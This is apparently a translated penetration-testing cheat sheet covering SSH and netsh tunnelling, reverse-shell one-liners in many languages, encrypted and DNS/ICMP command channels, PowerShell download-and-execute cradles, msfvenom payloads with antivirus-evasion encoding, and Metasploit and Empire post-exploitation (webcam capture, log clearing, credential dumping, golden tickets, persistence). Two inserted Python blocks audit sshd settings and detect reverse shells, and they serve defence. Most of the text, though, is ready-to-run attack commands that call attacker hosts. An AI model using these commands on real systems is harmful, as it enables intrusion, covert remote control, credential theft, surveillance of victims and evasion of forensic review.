          >PortTranC20.exe 127.0.0.1 3389 192.168.0.102 12345
          Once the connection is established, connect to port 389 on the attacking machine.

          SSH

          -C  compress the transfer, speeding it up
          -f  authenticate in the background
          -N  forwarding only, do not open a new shell
          -n  run in the background
          -q  quiet mode, show no debug output
          -l  specify the ssh login name
          -g  allow remote hosts to connect to the local forwarded port
          -L  local port forwarding
          -R  remote port forwarding
          -D  dynamic forwarding, i.e. a socks proxy
          -T  disable pseudo-terminal allocation
          -p  specify the remote ssh service port

          Forward (local) port forwarding

          External target 110, internal target 115, local attacking machine.
          Edit the config, then restart the ssh service:
          #vim /etc/ssh/sshd_config
          AllowTcpForwarding yes        (allow TCP forwarding)
          GatewayPorts yes              (allow remote hosts to connect to locally forwarded ports)
          TCPKeepAlive yes              (keep the TCP session alive)
          PasswordAuthentication yes    (password authentication)
          >ssh -C -f -N -g -L 33890:192.168.0.115:3389 root@192.168.0.110 -p 22
          Run on the local attacking machine: local port 33890 is forwarded to the remote port 3389.
          Bringing a session back to MSF:
          attacking machine -- Linux target with internet access -- Linux target without internet access -- Windows machine without internet access
          >msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Linux machine without internet access> lport=12138 -f exe -o /var/www/html/1.exe
          The attacking machine listens on port 12345.
          On the Linux machine without internet access:
          >ssh -C -f -N -g -L 0.0.0.0:12138:<attacking machine>:12345 root@<Linux host with internet access> -p 22

          Reverse (remote) port forwarding

          External attacking machine 107, internal target 97, target with internet access.
          Edit the config, then restart the ssh service:
          #vim /etc/ssh/sshd_config
          AllowTcpForwarding yes        (allow TCP forwarding)
          GatewayPorts yes              (allow remote hosts to connect to locally forwarded ports)
          TCPKeepAlive yes              (keep the TCP session alive)
          PasswordAuthentication yes    (password authentication)
          >ssh -C -f -N -g -R 33890:10.1.1.97:3389 root@192.168.0.107 -p 22
          Run on the target with internet access: port 33890 on the external attacking machine is forwarded to port 3389 in the isolated internal network.
          >netstat -tnlp
          Once forwarding works, install rinetd (a forward TCP forwarding tool) on the external attacking machine: apt install rinetd
          >vim /etc/rinetd.conf
          Add: 0.0.0.0 3389 127.0.0.1 33890
          >service rinetd start
          Given that 107 is the kali attacking machine, connecting to 107:33890 reaches the desktop of 10.1.1.97 in the internal network.
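          Added example, not part of the original notes, serving both the forward and the reverse forwarding sections above: a Python audit of sshd_config that reports the settings those sections turn on (AllowTcpForwarding, GatewayPorts, PasswordAuthentication) plus PermitRootLogin, honouring sshd's first-occurrence-wins rule and separating Match blocks. The config excerpt and the OpenSSH defaults used for missing keys are assumptions stated in the code.

```python
import re
from typing import Callable, Dict, List, Tuple

# Constructed sshd_config excerpt (not from a real host): the four settings the notes
# enable, a later duplicate that sshd ignores, and a Match block.
SAMPLE_SSHD_CONFIG = """
# constructed sample
Port 22
AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes
PasswordAuthentication yes
AllowTcpForwarding no
Match User deploy
    AllowTcpForwarding no
"""

# OpenSSH defaults assumed for keys that are absent from the file.
DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "passwordauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}

# key -> (predicate on the lowercased value, what a risky value means)
RISKY: Dict[str, Tuple[Callable[[str], bool], str]] = {
    "allowtcpforwarding": (lambda v: v != "no", "clients can tunnel (-L/-R/-D) through this host"),
    "gatewayports": (lambda v: v != "no", "forwarded ports bind to all interfaces, not only loopback"),
    "passwordauthentication": (lambda v: v == "yes", "password logins are allowed"),
    "permitrootlogin": (lambda v: v == "yes", "root may log in with a password"),
}

KEYVAL = re.compile(r"([^\s=]+)\s*=?\s*(.*)$")   # "Key value" or "Key=value"


def effective_settings(text: str) -> Tuple[Dict[str, str], List[Tuple[str, Dict[str, str]]]]:
    """Global settings with sshd's first-occurrence-wins rule; each Match block is
    returned separately as (criteria, settings).  Inline comments are stripped."""
    global_cfg: Dict[str, str] = {}
    match_blocks: List[Tuple[str, Dict[str, str]]] = []
    current: Dict[str, str] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = KEYVAL.match(line)
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        target = current if current is not None else global_cfg
        target.setdefault(key, value)          # first occurrence wins
    return global_cfg, match_blocks


def audit_sshd(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, effective value, 'explicit'|'default') for every risky global setting."""
    cfg, _ = effective_settings(text)
    findings = []
    for key, (is_risky, _why) in RISKY.items():
        source = "explicit" if key in cfg else "default"
        value = cfg.get(key, DEFAULTS[key]).lower()
        if is_risky(value):
            findings.append((key, value, source))
    return findings


if __name__ == "__main__":
    for key, value, source in audit_sshd(SAMPLE_SSHD_CONFIG):
        print(f"{key} = {value} ({source}): {RISKY[key][1]}")
```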

          Invoke-SocksProxy

          https://gitee.com/RichChigga/Invoke-SocksProxy
          >Import-Module .\Invoke-SocksProxy.psm1
          >Invoke-SocksProxy -bindPort 12138    (set up a socks proxy, then connect with a proxy client)


          SSF

          Single-layer network, forward

          https://github.com/securesocketfunneling/ssf/releases
          Run on the internal machine:
          >ssfd.exe -p 1080
          Run on the edge machine:
          >ssf.exe -L 12138:10.1.1.108:22 -p 1080 192.168.0.98    (exposes the SSH service of internal host 10.1.1.108)
          The edge machine can then reach the internal port.

          Single-layer network, reverse

          Run on the edge machine:
          >ssfd.exe -p 1080
          Run on the internal machine:
          >ssf.exe -R 12138:10.1.1.108:22 -p 1080 192.168.0.106


          Netsh

          Run on the edge machine:
          >netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=2222 connectaddress=10.1.1.108 connectport=22
          Forwards port 22 of internal host 10.1.1.108 to local port 2222; the attacking machine reaches the internal SSH service by connecting to port 2222 on the edge machine.
          >netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=13389 connectaddress=192.168.0.98 connectport=3389
          When a service on the target only accepts internal connections, forward its port out this way.
          Add a firewall rule:
          >netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localip=192.168.0.98 localport=13389 action=allow
          List all forwarding rules:
          >netsh interface portproxy show all
          Delete a specific forwarding rule:
          >netsh interface portproxy delete v4tov4 listenport=13389 listenaddress=192.168.0.98
          Delete all forwarding rules:
          >netsh interface portproxy reset

          Iptables

          IP forwarding must be enabled:
          >vim /etc/sysctl.conf
          Set net.ipv4.ip_forward=1


          Forward local port 22 to port 2222:
          >iptables -t nat -A PREROUTING -p tcp --dport 2222 -j REDIRECT --to-ports 22
          Forward port 3389 of internal host 98 to port 6789 on this host (110):
          >iptables -t nat -A PREROUTING -d 192.168.0.110 -p tcp --dport 6789 -j DNAT --to-destination 192.168.0.98:3389
          >iptables -t nat -A POSTROUTING -d 192.168.0.98 -p tcp --dport 3389 -j SNAT --to 192.168.0.110
          View the rules:
          >iptables -t nat -L
          Delete a rule:
          >iptables -t nat -D PREROUTING 1
          Delete all rules:
          >iptables -t nat -F

          chisel

          https://github.com/jpillora/chisel
          Run on the attacking machine:
          >chisel server -p 12138 --reverse
          Run on the target:
          >chisel client <public attacking machine IP>:12138 R:1234:127.0.0.1:3389
          Once established, connect to local port 1234 on the attacking machine to reach port 3389 on the target.

          Command & control

          Interactive shell

          >python -c 'import pty;pty.spawn("/bin/bash")'
          >expect -c 'spawn bash;interact'

          script reverse shell

          bash

          >/bin/bash -i > /dev/tcp/attackerip/4444 0<&1 2>&1
          >bash -i >& /dev/tcp/attackerip/4444 0>&1
          >0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
          >msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=4444 -o shell.sh

          nc

          >nc -e /bin/sh attackerip 4444
          >nc -Lp 31337 -vv -e cmd.exe
          Alternatively:
          >mknod backpipe p; nc 192.168.0.107 12138 0<backpipe | /bin/bash 1>backpipe
          >nc 192.168.0.10 31337

          telnet

          >mknod backpipe p; telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe

          php

          #php -r '$sock=fsockopen("IP",port);exec("/bin/sh -i <&3 >&3 2>&3");'
          <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/1234 0>&1'");?>

          python

          >python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]); '
          >msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
          >import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('IP',port)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)

          perl

          >perl -e 'use Socket;$i=" attackerip ";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
          >perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
          >perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'    ##### windows

          ruby

          >ruby -rsocket -e'f=TCPSocket.open("attackerip ",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
          >ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'    ##### windows
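          Added example, not part of the original notes: detection logic for the reverse-shell one-liners listed in this section (bash /dev/tcp, nc -e, mkfifo/mknod relays, scripted socket shells in python/perl/ruby/php, pty upgrades, msfvenom), run over constructed process-audit lines in an assumed `timestamp user= pid= cmd=` format.

```python
import re
from typing import Dict, List, Tuple

# Each rule fires only when every pattern in it matches the command line.
RULES: Dict[str, List[str]] = {
    "bash_dev_tcp": [r"/dev/(tcp|udp)/[^/\s]+/\d+"],
    "nc_exec": [r"\b(nc|ncat|netcat)\b[^|;&]*\s(-e|--exec|--sh-exec)(\s|$)"],
    "fifo_relay": [r"\b(mknod|mkfifo)\b",
                   r"\b(nc|ncat|netcat|telnet|openssl\s+s_client)\b"],
    "scripted_socket_shell": [r"\b(python[23]?|perl|ruby|php)\b",
                              r"\b(socket|fsockopen|TCPSocket|IO::Socket)\b",
                              r"(subprocess|exec|system|popen|/bin/(ba)?sh)"],
    "pty_upgrade": [r"pty\.spawn|expect\s+-c\s+['\"]spawn"],
    "msfvenom": [r"\bmsfvenom\b"],
}
COMPILED = {name: [re.compile(p, re.IGNORECASE) for p in pats] for name, pats in RULES.items()}

# Assumed audit-line layout (constructed; adapt the regex to auditd/EDR output as needed).
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+user=(?P<user>\S+)\s+pid=(?P<pid>\d+)\s+cmd=(?P<cmd>.*)$")

# Constructed sample lines, not from a real host.  Two are benign (tar, nc -zv port check,
# a dev server) and must not fire.
SAMPLE_LOG = [
    "2024-01-29T07:51:50Z user=www-data pid=4411 cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "2024-01-29T07:51:52Z user=www-data pid=4412 cmd=nc -e /bin/sh 10.0.0.5 4444",
    "2024-01-29T07:52:01Z user=backup pid=4420 cmd=tar czf /tmp/backup.tgz /var/www",
    "2024-01-29T07:52:05Z user=ops pid=4421 cmd=nc -zv 10.0.0.5 22",
    "2024-01-29T07:52:09Z user=www-data pid=4430 cmd=mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | "
    "openssl s_client -quiet -connect 10.0.0.5:1337 > /tmp/s",
    "2024-01-29T07:52:15Z user=www-data pid=4433 cmd=python -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.5\",4444));"
    "os.dup2(s.fileno(),0);p=subprocess.call([\"/bin/sh\",\"-i\"])'",
    "2024-01-29T07:52:20Z user=www-data pid=4434 cmd=python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "2024-01-29T07:53:00Z user=dev pid=4440 cmd=python3 manage.py runserver 0.0.0.0:8000",
]


def match_rules(cmdline: str) -> List[str]:
    """Names of all rules whose patterns all match the command line."""
    return [name for name, pats in COMPILED.items() if all(p.search(cmdline) for p in pats)]


def scan_log(lines: List[str]) -> List[Tuple[str, int, List[str]]]:
    """(user, pid, rules) for every audit line whose command matches at least one rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = match_rules(m.group("cmd"))
        if rules:
            hits.append((m.group("user"), int(m.group("pid")), rules))
    return hits


if __name__ == "__main__":
    for user, pid, rules in scan_log(SAMPLE_LOG):
        print(f"pid {pid} ({user}): {', '.join(rules)}")
```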

          OpenSSL encrypt shell

          Generate a certificate:
          >openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

          Linux

          Listen:
          >openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
          Run on the target:
          >mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.108:1337 > /tmp/s; rm /tmp/s
          This method encrypts the communication with TLS 1.2.

          Windows

          The attacking machine needs to listen on two ports, one to send commands and one to receive the output.
          Send:
          >openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
          Receive:
          >openssl s_server -quiet -key key.pem -cert cert.pem -port 1338
          Run on the target:
          >openssl s_client -quiet -connect 192.168.0.108:1337|cmd.exe|openssl s_client -quiet -connect 192.168.0.108:1338



          Dnscat2

          Install dnscat2:
          >apt-get -y install ruby-dev git make g++
          >gem install bundler
          >git clone https://github.com/iagox86/dnscat2.git
          >cd dnscat2/server
          >bundle install
          Run:
          >ruby dnscat2.rb abc.com -e open --no-cache

          Powercat

          Run on the target:
          >powercat -c 192.168.0.108 -v -dns abc.com -e cmd.exe
          In dnscat2:
          >session -i 1    (enter the session)

          Dnscat2 exe

          Linux:
          https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x86.tar.bz2
          https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x64.tar.bz2
          https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip
          Run on the attacking machine:
          >ruby dnscat2.rb --dns "domain=zone.com,host=192.168.0.108" --no-cache
          Run on the target:
          >dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108
          Run on the attacking machine:
          >session -i [ID]    (enter the session)


          DNS TXT Command

          https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1
          https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1
          Create a ps1 file and convert it with Out-DnsTxt; the command used here is net user.


          y0stUSgtTi3i5QIA
          Add a TXT record for the domain; here it is set up locally, normally it is configured at the domain registrar's site.
          Two further TXT records are needed, holding the start string and the stop string respectively.


          Run on the target:
          >Import-Module .\DNS_TXT_Pwnage.ps1
          >DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop

          Powershell

          MSF+Powershell

          Reverse connection to MSF. On the target:
          PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1')
          PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force
          Attacking machine:
          >use exploit/multi/handler
          >set payload windows/x64/meterpreter/reverse_https
          >run
          Or:
          >msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps
          >IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")
          >IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")
          >Invoke-Shellcode -Shellcode ($buf)
          Or:
          >msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1
          >powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"

          Powercat

          >powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
          Bind connection:
          Target: powercat -l -p 8080 -e cmd.exe -v
          Attacking machine: nc 192.168.0.1 8080 -vv
          Reverse connection:
          Attacking machine: nc -l -p 8080 -vv
          Target: powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe
          Remote execution:
          >powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"

          Nishang

          Bind shell
          Target:
          >powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"
          Attacking machine:
          >nc <target IP> 12138
          Reverse shell
          Attacking machine:
          >nc -vnlp 9999
          Target:
          >powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacking machine IP> -port 9999"
          UDP reverse shell
          Attacking machine:
          >nc -lvup 12138
          Target:
          >powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacking machine IP> -port 12138"
          HTTPS
          Attacking machine:
          >powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443"    (the IP address is the local machine's own IP)
          Target:
          >powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')"
          ICMP
          Attacking machine IP: 108, target IP: 100
          https://github.com/inquisb/icmpsh
          Run on the target:
          >powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108"
          Run on the attacking machine, after configuring the handling of ICMP ECHO requests:
          >sysctl -w net.ipv4.icmp_echo_ignore_all=1
          >./icmpsh_m.py 192.168.0.108 192.168.0.100

          Base64

          >powershell "$string='net user';[convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($string))"

          Metasploit

          Basic usage

          #systemctl start postgresql.service    (start the database service)
          #msfdb init    (initialize the database)
          #msfconsole    (enter the MSF framework)
          #search ms17-010    (search for attack modules)
          #use exploit/windows/smb/ms17_010_eternalblue    (use a module)
          #set payload windows/x64/meterpreter/reverse_tcp    (set the payload)
          #info    (show information)
          #show options    (show the parameters that need to be set)
          #set RHOST 192.168.125.138    (set a parameter)
          #exploit    (run the attack module)
          #back    (go back)

          Tips

          #handler -H 192.168.0.10 -P 3333 -p windows/x64/meterpreter/reverse_tcp    (quick listener)
          #setg    (set a global parameter)
          #set autorunscript migrate -f    (migrate the process automatically)
          #set autorunscript migrate -n explorer.exe
          #set AutoRunScript post/windows/manage/migrate
          #set prependmigrate true    (inject into a process automatically)
          #set prependmigrateProc svchost.exe
          #set exitonsession false    (keep listening after a session is obtained, to collect several sessions)
          #set stagerverifysslcert false    (avoid ssl errors)
          #set SessionCommunicationTimeout 0    (prevent the session from timing out)
          #set SessionExpirationTimeout 0    (prevent the session from being force-closed)
          #exploit -j -z    (keep listening in the background)
          >msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 --platform windows PrependMigrate=true PrependMigrateProc=explorer.exe -f exe -o 1.exe    (injects into an existing process when run)
          >set EnableStageEncoding true
          >set stageencoder x86/fnstenv_mov    (encode the stage for AV evasion)
          >set stageencodingfallback false

          Modules

          Auxiliary
          #show auxiliary    (list all auxiliary modules)
          Payload
          #show payloads    (list all payloads)
          A payload is the actual functional code that runs on the target when it is attacked.
          Generating payloads:
          #use exploit/multi/script/web_delivery
          >set target 2
          >msfvenom --list payloads    (list all payloads)
          >msfvenom --list encoders    (list all encoders)
          Windows
          #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe -o /root/1.exe
          #msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o 1.exe
          #msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f psh-reflection >xxx.ps1
          #msfvenom -a x64 --platform windows -p windows/powershell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
          >msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> /root/1.exe    (generate an NC bind shell)
          >msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> 1.exe    (generate an NC reverse shell)
          Linux
          #msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f elf -a x86 --platform linux -o shell
          #msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.1 LPORT=11111 -f raw > shell.sh
          MacOS
          #msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f macho > shell.macho
          Web
          #msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.php
          #msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f war > shell.war
          #msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f aspx -o payload.aspx
          #msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.jsp
          #msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f asp > shell.asp
          Android
          #msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f apk -o payload.apk
          #msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 -f raw > shell.apk
          #msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 R > test.apk
          shellcode
          #msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.0.1 LPORT=11111 -f c -o /root/1.c
          #msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.1 LPORT=11111 -o shell.py
          #msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.py
          #msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.pl
          #msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.rb
          #msfvenom -p cmd/unix/reverse_lua LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.lua
          Setting up the msf listener
          #use exploit/multi/handler
          #set payload windows/meterpreter/reverse_http    (specify the matching payload)
          #set LHOST 192.168.0.1
          #set LPORT 11111
          #exploit -j    (listen in the background)
          Alternatively, use the set payload command directly inside the exploit module to specify the payload.

          Meterpreter

          Interaction
          After a successful attack a session is returned; use sessions -l to list the sessions obtained so far.
          #sessions -l
          #sessions -i id    (interact with a session)
          #background    (send the current session to the background)
          #sessions -x    (check the heartbeat)
          #sessions -u [ID]    (upgrade a cmd shell to a meterpreter shell)
          Privilege escalation
          See the privilege escalation section.
          Commands
          #shell    (enter the target's cmd shell)
          #uictl [enable/disable] [keyboard/mouse/all]    (enable or disable the keyboard/mouse)
          #uictl disable mouse    (disable the mouse)
          #uictl disable keyboard    (disable the keyboard)
          #webcam_list    (list webcams)
          #webcam_snap    (take a photo with the webcam)
          #webcam_stream    (stream video from the webcam)
          #execute -H -i -f cmd.exe    (run cmd.exe; -H hidden, -i interactive)
          #execute -H -m -d calc.exe -f wce.exe -a "-o 1.txt"    (run hidden)
          #ps    (list the active processes)
          #migrate pid    (migrate to a process)
          #kill pid    (kill a process)
          File operations
          #pwd    (show the current directory)
          #ls    (list the files in the current directory)
          #search -f *pass*    (search for files)
          #cat c:\\passwd.txt    (show a file's contents)
          #upload /tmp/pwn.txt C:\\1.txt    (upload a file)
          #download c:\\passwd.txt /tmp/    (download a file)
          #edit c:\\1.txt    (edit or create a file)
          #rm C:\\1.txt    (delete a file)
          #mkdir folder    (create a directory)
          #rmdir folder    (delete a directory)
          #lcd /tmp    (change directory on the attacker's host)
          #timestomp -v C://2.txt    (show the timestamps)
          #timestomp C://2.txt -f C://1.txt    (copy the timestamps of 1.txt onto 2.txt)
          Post-exploitation & persistence
          For adding routes, setting up socks proxies, planting backdoors and so on, see the Backdoors & persistence section.
          Clear logs
          #clearev

          Spawning Cobalt Strike and Empire sessions from MSF

          Spawning an Empire session
          In Empire, create a Listener, then create a stager and choose windows/dll.
          In MSF:
          >use post/windows/manage/reflective_dll_inject
          Specify the session, the path to the dll and the process pid.
          Spawning a Cobalt Strike session
          Start a listener in Cobalt Strike: windows/beacon_http/reverse_http
          msf>use exploit/windows/manage/payload_inject
          Specify the IP, port and payload.

          Empire

          Installation

          #git clone https://github.com/EmpireProject/Empire.git
          #cd Empire/setup
          #./install.sh

          Listeners

          (Empire) > listeners
          (Empire: listeners) > uselistener http
          (Empire: listeners) > info    (show the parameters)
          (Empire: listeners/http) > set Name y
          (Empire: listeners/http) > set Host http://192.168.0.1
          (Empire: listeners/http) > set Port 8080
          (Empire: listeners/http) > execute
          >back    (return to the listeners module)
          >list    (show the active listeners)
          >kill http    (remove the listener)

          Stagers

          (Empire: listeners) > usestager windows/launcher_vbs    (press Tab twice to list all modules)
          (Empire: stager/windows/launcher_vbs) > info
          The listener name must be set; the output location can be set.
          (Empire: stager/windows/launcher_vbs) > set Listener y
          (Empire: stager/windows/launcher_vbs) > execute
          This generates a vbs file; the target checks in once it runs it.
          Use the launcher command to generate a powershell or python script directly:
          >launcher powershell Listener-Name
          Use rename to rename an agent:
          >rename 6NMCW4ZB target1
          Use the main command to return to the main menu.
          >list stale    (list machines whose agent has been lost)
          >remove stale    (remove machines whose agent has been lost)

          Connecting to the target and other operations

          >interact target1    (connect)
          >agents    (return to the target list)
          >back    (go up one level)
          >shell net user 1 1 /add    (run a system command)
          >mimikatz    (load the module and obtain passwords)
          >creds    (organize the obtained credentials; creds export /root/1.txt saves them; creds hash/plaintext selects the display format)
          >sc    (take a screenshot of the current desktop; stored in ./Empire/download/<agent name>/screenshot)
          >download c:\pass.txt    (download a file from the target)
          >upload hacked.txt c:\hacked.txt    (upload a local file to the target)

          Privilege escalation

          >agents    (if the Username in the list has no asterisk, privilege escalation is needed)
          >bypassuac listener    (a listener must be specified; escalates privileges)
          >usemodule privesc/ms16-032    (a listener must be specified; escalates privileges)
          >usemodule privesc/powerup/allchecks    (run all checks for vulnerabilities)

          Lateral movement

          Find machines where domain admins are logged in:
          >usemodule situational_awareness/network/powerview/user_hunter
          Token theft
          >mimikatz
          >creds    (obtain and organize hashes and passwords)
          >pth {ID}
          Steal an administrator token:
          >steal_token {PID}
          Session injection
          >ps    (list processes)
          >usemodule management/psinject    (set ProcId and Listener)
          Pass the hash
          Invoke-PsExec may be caught by AV.
          >usemodule situational_awareness/network/powerview/find_localadmin_access    (list the machines reachable for PsExec lateral movement)
          >usemodule lateral_movement/invoke_psexec    (set ComputerName and Listener)
          Or:
          >usemodule lateral_movement/invoke_wmi    (set ComputerName, Listener and CredID)
          Cross-domain:
          Parent domain DC: dc.zone.com
          Child domain DC: sub.zone.com
          Child domain computer: pc.sub.zone.com
          Child domain ordinary user: sub\user1
          Check the trust relationships:
          >usemodule situational_awareness/network/powerview/get_domain_trust
          Obtain the parent domain krbtgt SID: use management/user_to_sid with Domain and User=krbtgt set.
          >usemodule credentials/mimikatz/dcsync    (set UserName to <child domain>\krbtgt to obtain the child domain hash)
          >usemodule credentials/mimikatz/golden_ticket    (forge the SID: set User to the forged user and sids to the forged identifier {krbtgt sid}-519)
          >usemodule credentials/mimikatz/dcsync    (obtain the parent domain krbtgt hash)
          >usemodule credentials/mimikatz/golden_ticket    (PTH with the parent domain krbtgt; specify the parent domain CredID, user name and domain)
          >shell dir \\dc.zone.com\c$

          Backdoors & persistence

          Image File Execution Options hijacking
          >usemodule lateral_movement/invoke_wmi_debugger    (set Listener, ComputerName (uppercase) and TargetBinary: sethc.exe, Utilman.exe, osk.exe, Narrator.exe, Magnify.exe, i.e. Sticky Keys, Ease of Access, On-Screen Keyboard, Narrator and Magnifier respectively)
          Registry run key
          >usemodule persistence/elevated/registry*    (set Listener and the registry path RegPath [HKLM\software\microsoft\windows\currentversion\run])
          Scheduled task
          >usemodule persistence/elevated/schtasks*    (set Listener and DailyTime)
          WMI
          >usemodule persistence/elevated/wmi    (set Listener)
          SSP injection
          See the SSP section.

          Collection (information gathering)

          Module name    Function
          collection/ChromeDump    Collects passwords and browsing history saved by Chrome
          collection/FoxDump    Collects passwords and browsing history saved by Firefox
          collection/USBKeylogger*    Keylogging via ETW
          collection/WebcamRecorder    Captures video from the webcam
